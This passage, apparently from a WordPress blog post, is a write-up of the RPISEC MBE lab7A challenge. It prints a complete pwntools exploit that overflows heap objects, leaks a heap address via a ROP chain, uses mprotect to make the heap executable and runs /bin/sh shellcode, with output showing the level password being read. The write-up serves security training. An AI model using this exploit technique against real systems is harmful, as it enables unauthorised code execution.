\r\nlab7A@warzone:\/levels\/lab07$ cat \/tmp\/exploit_lab7A.py\r\nfrom pwn import *\r\n\r\np = remote("localhost", 7741)\r\n\r\nshellcode = "\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68"\\\r\n            "\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3"\\\r\n            "\\x89\\xc1\\x89\\xc2\\xb0\\x0b\\xcd"\\\r\n            "\\x80\\x31\\xc0\\x40\\xcd\\x80"\r\n\r\n#************************************************\r\n# stage 1\r\n\r\n# create first obj -> overflow 3 bytes changing msg_len\r\np.recvuntil("Enter Choice: ")\r\np.sendline("1")                 # 1. Create secure message\r\np.sendline("131")               #    --> len = 131\r\np.sendline("A"*130)             #    --> data = "AAAAAA...\\n"\r\n\r\n# create second obj -> we are going to overwrite this shortly\r\np.recvuntil("Enter Choice: ")\r\np.sendline("1")                 # 1. Create secure message\r\np.sendline("4")                 #    --> len = 4\r\np.sendline("A"*3)               #    --> data = "AAA\\n"\r\n\r\n# overwrite second obj\r\np.recvuntil("Enter Choice: ")\r\np.sendline("2")                 # 2. Edit secure message\r\np.sendline("0")                 #    --> index = 0\r\nexpl = "A"*132\r\nexpl += p32(0x00000000)\r\nexpl += p32(0x00000111)\r\nexpl += p32(0x0807e372) # add esp, 0x20; mov eax, esi; pop ebx; pop esi; ret\r\nexpl += shellcode\r\np.sendline(expl)                #    --> data = expl\r\n\r\n# call function -> leak heap address\r\np.recvuntil("Enter Choice: ")\r\np.sendline("4")                 # 4. Print message details\r\nnum = "1\\x00"\r\nnum += "A"*6\r\nnum += p32(0x8050bf0) # second gadget after pivoting: puts\r\nnum += p32(0x8049569) # return address: main\r\nnum += p32(0x80eef60) # 1st arg puts: messages\r\np.sendline(num)                 #    --> index = 1 (+rop-chain)\r\n\r\n# output contains address of first heap object in messages array\r\nret = p.recvuntil("Enter Choice: ")\r\nmessage_0 = int(ret[0x49:0x4d][::-1].encode("hex"), 16)\r\nlog.info("message_0 = " + hex(message_0))\r\n\r\n\r\n#************************************************\r\n# stage 2\r\n\r\n# 3rd obj -> overflow msg_len by 3 bytes\r\np.sendline("1")                 # 1. Create secure message\r\np.sendline("131")               #    --> len = 131\r\np.sendline("A"*130)             #    --> data = "AAAAAA...\\n"\r\n\r\n# 4th obj -> we are going to overwrite this shortly\r\np.recvuntil("Enter Choice: ")\r\np.sendline("1")                 # 1. Create secure message\r\np.sendline("4")                 #    --> len = 4\r\np.sendline("A"*3)               #    --> data = "AAA\\n"\r\n\r\n# overwrite 4th obj\r\np.recvuntil("Enter Choice: ")\r\np.sendline("2")                 # 2. Edit secure message\r\np.sendline("2")                 #    --> index = 2\r\nexpl = "A"*132\r\nexpl += p32(0x00000000)\r\nexpl += p32(0x00000111)\r\nexpl += p32(0x0807e372) # add esp, 0x20; mov eax, esi; pop ebx; pop esi; ret\r\np.sendline(expl)                #   --> data = expl\r\n\r\n# call function -> mprotect\r\np.recvuntil("Enter Choice: ")\r\np.sendline("4")                 # 4. Print message details\r\nnum = "3\\x00"\r\nnum += "A"*6\r\nnum += p32(0x806f340)          # second gadget: __mprotect\r\nnum += p32(message_0 + 276)    # return: heap-address\r\nnum += p32(message_0 - 0x19d8) # memory-page heap\r\nnum += p32(0x22000)            # size = 0x22000\r\nnum += p32(0x7)                # prot = RWX\r\np.sendline(num)                 #    --> index = 3 (+rop-chain)\r\np.recv(100)\r\n\r\np.interactive()\r\n<\/pre>\n
Summing it up again the script does:
\n–> Leak the address of messages[0]<\/code> on the heap using puts<\/code>.
\n–> Store a shellcode on the heap which calls execve(\"\/bin\/sh\")<\/code>.
\n–> Use the leaked address to call mprotect<\/code> making the heap executable.
\n–> Setting the address of the shellcode as the return address of the call.<\/p>\n
Finally running the script:<\/p>\n
\r\nlab7A@warzone:\/levels\/lab07$ python \/tmp\/exploit_lab7A.py\r\n[+] Opening connection to localhost on port 7741: Done\r\n[*] message_0 = 0x91ca9d8\r\n[*] Switching to interactive mode\r\n$ whoami\r\nlab7end\r\n$ cat \/home\/lab7end\/.pass\r\n0verfl0wz_0n_th3_h3ap_4int_s0_bad\r\n<\/pre>\n
Done! The final password for lab7 is 0verfl0wz_0n_th3_h3ap_4int_s0_bad<\/code>.<\/p>\n","protected":false},"excerpt":{"rendered":"
After we have introduced ASLR and ways to bypass it in the last writeup, we will expand our exploits to the Heap in this lab. In this lab there are only two levels: –> lab7C –> lab7A<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26,7],"tags":[8,9,13,10,11,12,14],"class_list":["post-386","post","type-post","status-publish","format-standard","hentry","category-rpisec-mbe","category-writeup","tag-assembly","tag-binary","tag-elf","tag-pwn","tag-r2","tag-reversing","tag-x86"],"_links":{"self":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts\/386"}],"collection":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=386"}],"version-history":[{"count":4,"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts\/386\/revisions"}],"predecessor-version":[{"id":579,"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts\/386\/revisions\/579"}],"wp:attachment":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=386"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=386"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=386"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}